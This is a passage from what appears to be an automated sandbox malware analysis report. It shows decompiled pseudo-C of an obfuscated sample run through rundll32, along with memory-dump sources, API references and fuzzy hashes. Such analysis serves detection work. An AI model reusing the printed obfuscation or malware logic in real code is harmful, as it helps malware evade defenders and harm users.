                                                                                                                          							}
                                                                                                                          							if(_t293 == 0xb133873) {
                                                                                                                          								_push(_v64);
                                                                                                                          								_t253 = E007AC3A0(_t257, _v100, __eflags, _v20, _v60, _t265);
                                                                                                                          								_t297 =  &(_t296[4]);
                                                                                                                          								 *((intOrPtr*)(_t292 + 0x38)) = _t253;
                                                                                                                          								__eflags = _t253;
                                                                                                                          								if(_t253 != 0) {
                                                                                                                          									E00797B8B( *((intOrPtr*)(_t292 + 0x38)), _v52,  *((intOrPtr*)(_t292 + 0x38)), _v56, _v96);
                                                                                                                          									_push( *((intOrPtr*)(_t292 + 0x38)));
                                                                                                                          									_push(_v92);
                                                                                                                          									_push(_v48);
                                                                                                                          									_t265 = _v88;
                                                                                                                          									E00797C37(_v88, _v44);
                                                                                                                          									_t296 =  &(_t297[6]);
                                                                                                                          									_t293 = 0x865547f;
                                                                                                                          									goto L1;
                                                                                                                          								}
                                                                                                                          							} else {
                                                                                                                          								if(_t293 == 0xb7a2405) {
                                                                                                                          									return E007A9E56(_v76, _v16, _v36,  *((intOrPtr*)(_t292 + 0x38)));
                                                                                                                          								}
                                                                                                                          								if(_t293 != _t251) {
                                                                                                                          									goto L13;
                                                                                                                          								} else {
                                                                                                                          									_t253 = E007946BE(_t265, _v24, _t265, _v28, _t265, _v32, _v104, _v68, _t265, _t292, E0079219A, _v72);
                                                                                                                          									_t296 =  &(_t296[0xa]);
                                                                                                                          									 *((intOrPtr*)(_t292 + 0x2c)) = _t253;
                                                                                                                          									if(_t253 == 0) {
                                                                                                                          										_t293 = 0xb7a2405;
                                                                                                                          										while(1) {
                                                                                                                          											L1:
                                                                                                                          											_t251 = 0xc3f018b;
                                                                                                                          											goto L2;
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							return _t253;
                                                                                                                          						}
                                                                                                                          						_t293 = 0xb133873;
                                                                                                                          						L13:
                                                                                                                          						__eflags = _t293 - 0x1aeb2e;
                                                                                                                          					} while (__eflags != 0);
                                                                                                                          					return _t251;
                                                                                                                          				}
                                                                                                                          			}












































                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: $2$'|6$3`S$8$8pM$>yhM$DT%1$k l$kE3Q$pj$q
                                                                                                                          • API String ID: 0-1622084174
                                                                                                                          • Opcode ID: 3d52fc902c02f262a8fe7634be7bb8022bcbb1850088094ffd657f1df36bc98b
                                                                                                                          • Instruction ID: 031944ac803ccad1c89fbfcfc16c3580730d19ea97a988e5015d53aa1522ce99
                                                                                                                          • Opcode Fuzzy Hash: 3d52fc902c02f262a8fe7634be7bb8022bcbb1850088094ffd657f1df36bc98b
                                                                                                                          • Instruction Fuzzy Hash: 2EB130B2508341AFD758CF25D58A80BFBE1FBC4758F00891DF69A96220D3B9D959CF82
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 94%
                                                                                                                          			E007964E2(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                          				char _v260;
                                                                                                                          				signed int _v264;
                                                                                                                          				intOrPtr _v268;
                                                                                                                          				char _v276;
                                                                                                                          				signed int _v280;
                                                                                                                          				signed int _v284;
                                                                                                                          				signed int _v288;
                                                                                                                          				signed int _v292;
                                                                                                                          				signed int _v296;
                                                                                                                          				signed int _v300;
                                                                                                                          				signed int _v304;
                                                                                                                          				signed int _v308;
                                                                                                                          				signed int _v312;
                                                                                                                          				signed int _v316;
                                                                                                                          				signed int _v320;
                                                                                                                          				signed int _v324;
                                                                                                                          				signed int _v328;
                                                                                                                          				signed int _v332;
                                                                                                                          				signed int _v336;
                                                                                                                          				signed int _v340;
                                                                                                                          				signed int _v344;
                                                                                                                          				signed int _v348;
                                                                                                                          				signed int _v352;
                                                                                                                          				signed int _v356;
                                                                                                                          				signed int _v360;
                                                                                                                          				signed int _v364;
                                                                                                                          				signed int _v368;
                                                                                                                          				signed int _v372;
                                                                                                                          				signed int _v376;
                                                                                                                          				signed int _v380;
                                                                                                                          				signed int _v384;
                                                                                                                          				signed int _v388;
                                                                                                                          				signed int _v392;
                                                                                                                          				signed int _v396;
                                                                                                                          				signed int _v400;
                                                                                                                          				signed int _v404;
                                                                                                                          				signed int _v408;
                                                                                                                          				signed int _v412;
                                                                                                                          				void* _t311;
                                                                                                                          				void* _t332;
                                                                                                                          				intOrPtr _t335;
                                                                                                                          				intOrPtr _t338;
                                                                                                                          				intOrPtr _t343;
                                                                                                                          				void* _t345;
                                                                                                                          				void* _t347;
                                                                                                                          				void* _t349;
                                                                                                                          				void* _t352;
                                                                                                                          				intOrPtr _t359;
                                                                                                                          				intOrPtr _t361;
                                                                                                                          				intOrPtr* _t362;
                                                                                                                          				intOrPtr _t364;
                                                                                                                          				signed int _t367;
                                                                                                                          				intOrPtr _t386;
                                                                                                                          				intOrPtr _t387;
                                                                                                                          				intOrPtr _t413;
                                                                                                                          				signed int _t414;
                                                                                                                          				signed int _t415;
                                                                                                                          				signed int _t416;
                                                                                                                          				signed int _t417;
                                                                                                                          				signed int _t418;
                                                                                                                          				signed int _t419;
                                                                                                                          				signed int _t420;
                                                                                                                          				signed int _t421;
                                                                                                                          				signed int _t422;
                                                                                                                          				void* _t423;
                                                                                                                          				signed int* _t425;
                                                                                                                          				void* _t427;
                                                                                                                          
                                                                                                                          				_push(_a24);
                                                                                                                          				_t423 = __edx;
                                                                                                                          				_push(_a20);
                                                                                                                          				_push(_a16);
                                                                                                                          				_push(_a12);
                                                                                                                          				_push(_a8);
                                                                                                                          				_push(_a4);
                                                                                                                          				_push(__edx);
                                                                                                                          				_push(__ecx);
                                                                                                                          				E007A20B9(_t311);
                                                                                                                          				_v264 = _v264 & 0x00000000;
                                                                                                                          				_t425 =  &(( &_v412)[8]);
                                                                                                                          				_v268 = 0x38f10b;
                                                                                                                          				_v376 = 0x1d6e4;
                                                                                                                          				_t364 = 0;
                                                                                                                          				_v376 = _v376 + 0x2cf5;
                                                                                                                          				_t367 = 0x349a1a2;
                                                                                                                          				_v376 = _v376 + 0xffffbc4f;
                                                                                                                          				_v376 = _v376 + 0xc828;
                                                                                                                          				_v376 = _v376 ^ 0x000c4abe;
                                                                                                                          				_v344 = 0xf0b614;
                                                                                                                          				_t415 = 0x49;
                                                                                                                          				_v344 = _v344 / _t415;
                                                                                                                          				_v344 = _v344 ^ 0x0006b22b;
                                                                                                                          				_v296 = 0xc48c2;
                                                                                                                          				_v296 = _v296 >> 0xa;
                                                                                                                          				_v296 = _v296 ^ 0x0001ad51;
                                                                                                                          				_v384 = 0x7feda9;
                                                                                                                          				_t416 = 0x39;
                                                                                                                          				_v384 = _v384 * 0x1a;
                                                                                                                          				_v384 = _v384 ^ 0x3da8c069;
                                                                                                                          				_v384 = _v384 + 0xffff691b;
                                                                                                                          				_v384 = _v384 ^ 0x315a0b75;
                                                                                                                          				_v400 = 0x77d138;
                                                                                                                          				_v400 = _v400 + 0xffff5a87;
                                                                                                                          				_v400 = _v400 << 3;
                                                                                                                          				_v400 = _v400 + 0xffff9ef2;
                                                                                                                          				_v400 = _v400 ^ 0x03bdd381;
                                                                                                                          				_v312 = 0x267902;
                                                                                                                          				_v312 = _v312 | 0xf93e454e;
                                                                                                                          				_v312 = _v312 ^ 0xf93fe769;
                                                                                                                          				_v308 = 0x6d5338;
                                                                                                                          				_v308 = _v308 ^ 0x3f4c4be5;
                                                                                                                          				_v308 = _v308 ^ 0x3f211e75;
                                                                                                                          				_v328 = 0x5e1da9;
                                                                                                                          				_v328 = _v328 / _t416;
                                                                                                                          				_v328 = _v328 ^ 0x000cc368;
                                                                                                                          				_v364 = 0xd2dbf2;
                                                                                                                          				_v364 = _v364 + 0xffffefaa;
                                                                                                                          				_v364 = _v364 + 0xd543;
                                                                                                                          				_v364 = _v364 ^ 0x00d6d9fb;
                                                                                                                          				_v304 = 0x235f1e;
                                                                                                                          				_t417 = 0x2e;
                                                                                                                          				_v304 = _v304 / _t417;
                                                                                                                          				_v304 = _v304 ^ 0x000b3ded;
                                                                                                                          				_v320 = 0xc8231f;
                                                                                                                          				_v320 = _v320 << 0xc;
                                                                                                                          				_v320 = _v320 ^ 0x8237c00a;
                                                                                                                          				_v356 = 0xee2c9b;
                                                                                                                          				_v356 = _v356 ^ 0xa0da06c4;
                                                                                                                          				_v356 = _v356 ^ 0xf246f640;
                                                                                                                          				_v356 = _v356 ^ 0x52703357;
                                                                                                                          				_v412 = 0xc100a3;
                                                                                                                          				_v412 = _v412 ^ 0xb8e7c080;
                                                                                                                          				_v412 = _v412 ^ 0xb6721a67;
                                                                                                                          				_v412 = _v412 ^ 0xff44de7f;
                                                                                                                          				_v412 = _v412 ^ 0xf11e2702;
                                                                                                                          				_v396 = 0xa6af25;
                                                                                                                          				_v396 = _v396 << 0x10;
                                                                                                                          				_v396 = _v396 >> 7;
                                                                                                                          				_v396 = _v396 + 0xffff7054;
                                                                                                                          				_v396 = _v396 ^ 0x015ec427;
                                                                                                                          				_v404 = 0x1f48c8;
                                                                                                                          				_t418 = 0x2d;
                                                                                                                          				_v404 = _v404 / _t418;
                                                                                                                          				_v404 = _v404 << 0xb;
                                                                                                                          				_v404 = _v404 | 0x7455ca98;
                                                                                                                          				_v404 = _v404 ^ 0x75da0b0a;
                                                                                                                          				_v368 = 0x174318;
                                                                                                                          				_v368 = _v368 + 0x805d;
                                                                                                                          				_v368 = _v368 ^ 0x0012ca04;
                                                                                                                          				_v408 = 0x579c92;
                                                                                                                          				_t419 = 0x65;
                                                                                                                          				_v408 = _v408 * 0x61;
                                                                                                                          				_v408 = _v408 ^ 0x6a2d4e62;
                                                                                                                          				_v408 = _v408 + 0xd9d0;
                                                                                                                          				_v408 = _v408 ^ 0x4b1c9053;
                                                                                                                          				_v392 = 0x2598b2;
                                                                                                                          				_v392 = _v392 * 0xd;
                                                                                                                          				_v392 = _v392 ^ 0xb79fc0d8;
                                                                                                                          				_v392 = _v392 + 0xffff9085;
                                                                                                                          				_v392 = _v392 ^ 0xb671271d;
                                                                                                                          				_v324 = 0x8734;
                                                                                                                          				_v324 = _v324 + 0xffff82f4;
                                                                                                                          				_v324 = _v324 ^ 0x000c0e93;
                                                                                                                          				_v332 = 0x81f499;
                                                                                                                          				_v332 = _v332 ^ 0xcb023f28;
                                                                                                                          				_v332 = _v332 ^ 0xcb8aeffa;
                                                                                                                          				_v340 = 0xbb3951;
                                                                                                                          				_v340 = _v340 ^ 0x050a1ed9;
                                                                                                                          				_v340 = _v340 ^ 0x05b74055;
                                                                                                                          				_v372 = 0x5c4d3f;
                                                                                                                          				_v372 = _v372 + 0xffffba18;
                                                                                                                          				_v372 = _v372 | 0xc0b40c25;
                                                                                                                          				_v372 = _v372 >> 3;
                                                                                                                          				_v372 = _v372 ^ 0x1815f0ae;
                                                                                                                          				_v380 = 0xe44e59;
                                                                                                                          				_v380 = _v380 + 0x7d25;
                                                                                                                          				_v380 = _v380 + 0xffff00c0;
                                                                                                                          				_v380 = _v380 << 0xa;
                                                                                                                          				_v380 = _v380 ^ 0x8f30862d;
                                                                                                                          				_v360 = 0x1cbdf;
                                                                                                                          				_v360 = _v360 + 0xffff6e4b;
                                                                                                                          				_v360 = _v360 >> 8;
                                                                                                                          				_v360 = _v360 ^ 0x0001cec6;
                                                                                                                          				_v348 = 0xf4499d;
                                                                                                                          				_v348 = _v348 + 0x832d;
                                                                                                                          				_v348 = _v348 << 2;
                                                                                                                          				_v348 = _v348 ^ 0x03dc7480;
                                                                                                                          				_v352 = 0x4c1d4a;
                                                                                                                          				_v352 = _v352 >> 0xd;
                                                                                                                          				_v352 = _v352 * 0xe;
                                                                                                                          				_v352 = _v352 ^ 0x0003e302;
                                                                                                                          				_v388 = 0x7e89b7;
                                                                                                                          				_v388 = _v388 / _t419;
                                                                                                                          				_t420 = 0x48;
                                                                                                                          				_v388 = _v388 / _t420;
                                                                                                                          				_t421 = 0x2b;
                                                                                                                          				_t414 = _v368;
                                                                                                                          				_v388 = _v388 / _t421;
                                                                                                                          				_v388 = _v388 ^ 0x000ed69e;
                                                                                                                          				_t422 = _v368;
                                                                                                                          				_v300 = 0xe9da01;
                                                                                                                          				_v300 = _v300 + 0xffffd878;
                                                                                                                          				_v300 = _v300 ^ 0x00eb5be0;
                                                                                                                          				_v336 = 0x6aaf6d;
                                                                                                                          				_v336 = _v336 * 0x22;
                                                                                                                          				_v336 = _v336 ^ 0x0e2b42a4;
                                                                                                                          				_v316 = 0x54d710;
                                                                                                                          				_v316 = _v316 >> 0xc;
                                                                                                                          				_v316 = _v316 ^ 0x0000014d;
                                                                                                                          				while(1) {
                                                                                                                          					L1:
                                                                                                                          					_t332 = 0x61250f6;
                                                                                                                          					do {
                                                                                                                          						while(1) {
                                                                                                                          							L2:
                                                                                                                          							_t427 = _t367 - _t332;
                                                                                                                          							if(_t427 > 0) {
                                                                                                                          								break;
                                                                                                                          							}
                                                                                                                          							if(_t427 == 0) {
                                                                                                                          								_t352 = E007A0AE0(0x40, 1);
                                                                                                                          								_push(_v320);
                                                                                                                          								_push( &_v260);
                                                                                                                          								_push(_t352);
                                                                                                                          								_push(0xb);
                                                                                                                          								E007980E3(_v364, _v304);
                                                                                                                          								_t425 =  &(_t425[6]);
                                                                                                                          								_t367 = 0x97954ea;
                                                                                                                          								while(1) {
                                                                                                                          									L1:
                                                                                                                          									_t332 = 0x61250f6;
                                                                                                                          									goto L2;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							if(_t367 == 0x2db8754) {
                                                                                                                          								E007A8519(_v360, _v348, _v292);
                                                                                                                          								E007A8519(_v352, _v388, _t422);
                                                                                                                          								E007A8519(_v300, _v336, _v284);
                                                                                                                          								_t367 = _t414;
                                                                                                                          								L33:
                                                                                                                          								_t332 = 0x61250f6;
                                                                                                                          								goto L34;
                                                                                                                          							}
                                                                                                                          							if(_t367 == 0x349a1a2) {
                                                                                                                          								_t422 = 0;
                                                                                                                          								E00794B61( &_v260, 0x100, _v376, _v344);
                                                                                                                          								_v284 = _v284 & 0;
                                                                                                                          								_v280 = _v280 & 0;
                                                                                                                          								_v292 = _v292 & 0;
                                                                                                                          								_v288 = _v288 & 0;
                                                                                                                          								_t367 = 0xea9523f;
                                                                                                                          								while(1) {
                                                                                                                          									L1:
                                                                                                                          									_t332 = 0x61250f6;
                                                                                                                          									goto L2;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							if(_t367 == 0x47b49b8) {
                                                                                                                          								if(_v288 >= _v316) {
                                                                                                                          									_t359 = E007AF435( &_v292,  &_v284);
                                                                                                                          								} else {
                                                                                                                          									_t359 = E007AA666( &_v292);
                                                                                                                          								}
                                                                                                                          								_t422 = _t359;
                                                                                                                          								_t332 = 0x61250f6;
                                                                                                                          								_t367 =  !=  ? 0x61250f6 : 0x2db8754;
                                                                                                                          								continue;
                                                                                                                          							}
                                                                                                                          							if(_t367 != 0x54d1846) {
                                                                                                                          								goto L34;
                                                                                                                          							}
                                                                                                                          							_t386 =  *0x7b3e08; // 0x0
                                                                                                                          							_t361 =  *((intOrPtr*)( *((intOrPtr*)(_t386 + 4))));
                                                                                                                          							 *((intOrPtr*)(_t386 + 0x14)) =  *((intOrPtr*)(_t386 + 0x14)) + 1;
                                                                                                                          							_t413 =  *((intOrPtr*)(_t386 + 0x14));
                                                                                                                          							 *((intOrPtr*)(_t386 + 4)) = _t361;
                                                                                                                          							if(_t361 == 0) {
                                                                                                                          								 *((intOrPtr*)(_t386 + 4)) =  *((intOrPtr*)(_t386 + 0x20));
                                                                                                                          							}
                                                                                                                          							_t362 =  *0x7b3e08; // 0x0
                                                                                                                          							if(_t413 >=  *_t362) {
                                                                                                                          								_t387 =  *0x7b3e08; // 0x0
                                                                                                                          								 *(_t387 + 0x14) =  *(_t387 + 0x14) & 0x00000000;
                                                                                                                          								L37:
                                                                                                                          								return _t364;
                                                                                                                          							} else {
                                                                                                                          								_t367 = 0x349a1a2;
                                                                                                                          								while(1) {
                                                                                                                          									L1:
                                                                                                                          									_t332 = 0x61250f6;
                                                                                                                          									goto L2;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						if(_t367 == 0x70f4b52) {
                                                                                                                          							E007A8519(_v372, _v380, _v276);
                                                                                                                          							_t367 = 0x2db8754;
                                                                                                                          							goto L33;
                                                                                                                          						}
                                                                                                                          						if(_t367 == 0x97954ea) {
                                                                                                                          							_t335 =  *0x7b3e08; // 0x0
                                                                                                                          							_t338 =  *0x7b3e08; // 0x0
                                                                                                                          							_t343 =  *0x7b3e08; // 0x0
                                                                                                                          							_t345 = E007AE395( *((intOrPtr*)( *((intOrPtr*)(_t343 + 4)) + 0x1a)),  &_v284,  &_v276, _v356, _v412,  &_v260, _v396, _t422, _v404, _v368,  *((intOrPtr*)(_t338 + 4)) + 0x1c, _v408,  *( *((intOrPtr*)(_t335 + 4)) + 0x18) & 0x0000ffff);
                                                                                                                          							_t425 =  &(_t425[0xb]);
                                                                                                                          							if(_t345 == 0) {
                                                                                                                          								_t414 = 0x54d1846;
                                                                                                                          								_t367 = 0x2db8754;
                                                                                                                          							} else {
                                                                                                                          								_t367 = 0xcdb2e90;
                                                                                                                          							}
                                                                                                                          							while(1) {
                                                                                                                          								L1:
                                                                                                                          								_t332 = 0x61250f6;
                                                                                                                          								goto L2;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						if(_t367 == 0xcdb2e90) {
                                                                                                                          							_t347 = E00795548(_v324, _a24, _v332, _v340,  &_v276);
                                                                                                                          							_t425 =  &(_t425[4]);
                                                                                                                          							if(_t347 == 0) {
                                                                                                                          								_t414 = 0x54d1846;
                                                                                                                          							} else {
                                                                                                                          								_t414 = 0xa80516a;
                                                                                                                          								_t364 = 1;
                                                                                                                          							}
                                                                                                                          							_t367 = 0x70f4b52;
                                                                                                                          							while(1) {
                                                                                                                          								L1:
                                                                                                                          								_t332 = 0x61250f6;
                                                                                                                          								goto L2;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						if(_t367 != 0xea9523f) {
                                                                                                                          							goto L34;
                                                                                                                          						}
                                                                                                                          						_t349 = E0079CF47(_v296, _v384, _t423,  &_v292, _v400, _a8, _v312);
                                                                                                                          						_t425 =  &(_t425[5]);
                                                                                                                          						if(_t349 == 0) {
                                                                                                                          							goto L37;
                                                                                                                          						}
                                                                                                                          						_t367 = 0x47b49b8;
                                                                                                                          						goto L1;
                                                                                                                          						L34:
                                                                                                                          					} while (_t367 != 0xa80516a);
                                                                                                                          					goto L37;
                                                                                                                          				}
                                                                                                                          			}






































































                                                                                                                          0x0079685e
                                                                                                                          0x00796863
                                                                                                                          0x0079686b
                                                                                                                          0x00796873
                                                                                                                          0x0079687d
                                                                                                                          0x00796881
                                                                                                                          0x00796889
                                                                                                                          0x00796899
                                                                                                                          0x007968a1
                                                                                                                          0x007968a6
                                                                                                                          0x007968b0
                                                                                                                          0x007968b3
                                                                                                                          0x007968b7
                                                                                                                          0x007968bb
                                                                                                                          0x007968c3
                                                                                                                          0x007968c7
                                                                                                                          0x007968d2
                                                                                                                          0x007968dd
                                                                                                                          0x007968e8
                                                                                                                          0x007968f5
                                                                                                                          0x007968f9
                                                                                                                          0x00796901
                                                                                                                          0x00796909
                                                                                                                          0x0079690e
                                                                                                                          0x00796916
                                                                                                                          0x00796916
                                                                                                                          0x00796916
                                                                                                                          0x0079691b
                                                                                                                          0x0079691b
                                                                                                                          0x0079691b
                                                                                                                          0x0079691b
                                                                                                                          0x0079691d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00796923
                                                                                                                          0x00796a56
                                                                                                                          0x00796a5b
                                                                                                                          0x00796a6d
                                                                                                                          0x00796a72
                                                                                                                          0x00796a73
                                                                                                                          0x00796a75
                                                                                                                          0x00796a7a
                                                                                                                          0x00796a7d
                                                                                                                          0x00796916
                                                                                                                          0x00796916
                                                                                                                          0x00796916
                                                                                                                          0x00000000
                                                                                                                          0x00796916
                                                                                                                          0x00796916
                                                                                                                          0x0079692f
                                                                                                                          0x00796a16
                                                                                                                          0x00796a25
                                                                                                                          0x00796a3d
                                                                                                                          0x00796a43
                                                                                                                          0x00796bc8
                                                                                                                          0x00796bc8
                                                                                                                          0x00000000
                                                                                                                          0x00796bc8
                                                                                                                          0x0079693b
                                                                                                                          0x007969d8
                                                                                                                          0x007969da
                                                                                                                          0x007969df
                                                                                                                          0x007969e6
                                                                                                                          0x007969ed
                                                                                                                          0x007969f4
                                                                                                                          0x007969fd
                                                                                                                          0x00796916
                                                                                                                          0x00796916
                                                                                                                          0x00796916
                                                                                                                          0x00000000
                                                                                                                          0x00796916
                                                                                                                          0x00796916
                                                                                                                          0x00796947
                                                                                                                          0x00796999
                                                                                                                          0x007969a9
                                                                                                                          0x0079699b
                                                                                                                          0x0079699b
                                                                                                                          0x0079699b
                                                                                                                          0x007969ae
                                                                                                                          0x007969b7
                                                                                                                          0x007969bc
                                                                                                                          0x00000000
                                                                                                                          0x007969bc
                                                                                                                          0x0079694f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00796955
                                                                                                                          0x0079695e
                                                                                                                          0x00796960
                                                                                                                          0x00796963
                                                                                                                          0x00796966
                                                                                                                          0x0079696b
                                                                                                                          0x00796970
                                                                                                                          0x00796970
                                                                                                                          0x00796973
                                                                                                                          0x0079697a
                                                                                                                          0x00796bdb
                                                                                                                          0x00796be1
                                                                                                                          0x00796be8
                                                                                                                          0x00796bf1
                                                                                                                          0x00796980
                                                                                                                          0x00796980
                                                                                                                          0x00796916
                                                                                                                          0x00796916
                                                                                                                          0x00796916
                                                                                                                          0x00000000
                                                                                                                          0x00796916
                                                                                                                          0x00796916
                                                                                                                          0x0079697a
                                                                                                                          0x00796a8d
                                                                                                                          0x00796bbd
                                                                                                                          0x00796bc3
                                                                                                                          0x00000000
                                                                                                                          0x00796bc3
                                                                                                                          0x00796a99
                                                                                                                          0x00796b34
                                                                                                                          0x00796b4c
                                                                                                                          0x00796b7d
                                                                                                                          0x00796b89
                                                                                                                          0x00796b8e
                                                                                                                          0x00796b93
                                                                                                                          0x00796b9f
                                                                                                                          0x00796ba4
                                                                                                                          0x00796b95
                                                                                                                          0x00796b95
                                                                                                                          0x00796b95
                                                                                                                          0x00796916
                                                                                                                          0x00796916
                                                                                                                          0x00796916
                                                                                                                          0x00000000
                                                                                                                          0x00796916
                                                                                                                          0x00796916
                                                                                                                          0x00796aa5
                                                                                                                          0x00796b0f
                                                                                                                          0x00796b14
                                                                                                                          0x00796b19
                                                                                                                          0x00796b25
                                                                                                                          0x00796b1b
                                                                                                                          0x00796b1d
                                                                                                                          0x00796b22
                                                                                                                          0x00796b22
                                                                                                                          0x00796b2a
                                                                                                                          0x00796916
                                                                                                                          0x00796916
                                                                                                                          0x00796916
                                                                                                                          0x00000000
                                                                                                                          0x00796916
                                                                                                                          0x00796916
                                                                                                                          0x00796aad
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00796ad6
                                                                                                                          0x00796adb
                                                                                                                          0x00796ae0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00796ae6
                                                                                                                          0x00000000
                                                                                                                          0x00796bcd
                                                                                                                          0x00796bcd
                                                                                                                          0x00000000
                                                                                                                          0x00796bd9

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: %}$?M\$W3pR$YN$bN-j$KL?$Ty$Ty$[$[
                                                                                                                          • API String ID: 0-2895984816
                                                                                                                          • Opcode ID: 670f386907e521f46632b6352961800ae520407cddd891b37e489be2328f419a
                                                                                                                          • Instruction ID: ffb5f3c4066524702eb462ae70ec2aec88d159ce8fe40c6bdf405e0c0fc9ebca
                                                                                                                          • Opcode Fuzzy Hash: 670f386907e521f46632b6352961800ae520407cddd891b37e489be2328f419a
                                                                                                                          • Instruction Fuzzy Hash: 1D0245B1508380DFC7A4CF65D589A5BBBE1FBC4358F208A0DF59A86260D7B8D949CF42
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 10021873
                                                                                                                          • GetFullPathNameA.KERNEL32(?,00000104,?,?,00000014), ref: 100218B4
                                                                                                                            • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                          • PathIsUNCA.SHLWAPI(?), ref: 100218FE
                                                                                                                          • GetVolumeInformationA.KERNEL32 ref: 1002191C
                                                                                                                          • CharUpperA.USER32 ref: 10021943
                                                                                                                          • FindFirstFileA.KERNEL32(?,00000000), ref: 10021954
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 10021960
                                                                                                                          • lstrlenA.KERNEL32(?), ref: 10021975
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3InformationNameThrowUpperVolumelstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3249967234-0
                                                                                                                          • Opcode ID: eb490681b6d568b073a389bcc3f25b73e071b185c17e64a21006f2b4c6435a32
                                                                                                                          • Instruction ID: 60a4613adf5c573b6f7ecf717c69f11d5bc108e5d701f0798ce0fed1b7752ca1
                                                                                                                          • Opcode Fuzzy Hash: eb490681b6d568b073a389bcc3f25b73e071b185c17e64a21006f2b4c6435a32
                                                                                                                          • Instruction Fuzzy Hash: 0E41DF7990024AAFEB11DFB4DC95AFF77BCEF14355F800529F815E2192EB30A944CA61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E00795E60(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                          				intOrPtr _v8;
                                                                                                                          				intOrPtr _v12;
                                                                                                                          				char _v16;
                                                                                                                          				intOrPtr _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				signed int _v32;
                                                                                                                          				signed int _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				signed int _v44;
                                                                                                                          				signed int _v48;
                                                                                                                          				signed int _v52;
                                                                                                                          				signed int _v56;
                                                                                                                          				signed int _v60;
                                                                                                                          				signed int _v64;
                                                                                                                          				signed int _v68;
                                                                                                                          				signed int _v72;
                                                                                                                          				signed int _v76;
                                                                                                                          				signed int _v80;
                                                                                                                          				signed int _v84;
                                                                                                                          				signed int _v88;
                                                                                                                          				signed int _v92;
                                                                                                                          				signed int _v96;
                                                                                                                          				signed int _v100;
                                                                                                                          				signed int _v104;
                                                                                                                          				signed int _v108;
                                                                                                                          				signed int _v112;
                                                                                                                          				signed int _v116;
                                                                                                                          				signed int _v120;
                                                                                                                          				signed int _v124;
                                                                                                                          				signed int _v128;
                                                                                                                          				signed int _v132;
                                                                                                                          				signed int _v136;
                                                                                                                          				signed int _v140;
                                                                                                                          				signed int _v144;
                                                                                                                          				signed int _v148;
                                                                                                                          				void* _t339;
                                                                                                                          				intOrPtr _t372;
                                                                                                                          				void* _t374;
                                                                                                                          				intOrPtr _t381;
                                                                                                                          				intOrPtr _t382;
                                                                                                                          				void* _t384;
                                                                                                                          				intOrPtr* _t385;
                                                                                                                          				void* _t387;
                                                                                                                          				intOrPtr _t421;
                                                                                                                          				intOrPtr* _t423;
                                                                                                                          				signed int _t424;
                                                                                                                          				signed int _t425;
                                                                                                                          				signed int _t426;
                                                                                                                          				signed int _t427;
                                                                                                                          				signed int _t428;
                                                                                                                          				signed int _t429;
                                                                                                                          				signed int _t430;
                                                                                                                          				signed int _t431;
                                                                                                                          				signed int _t432;
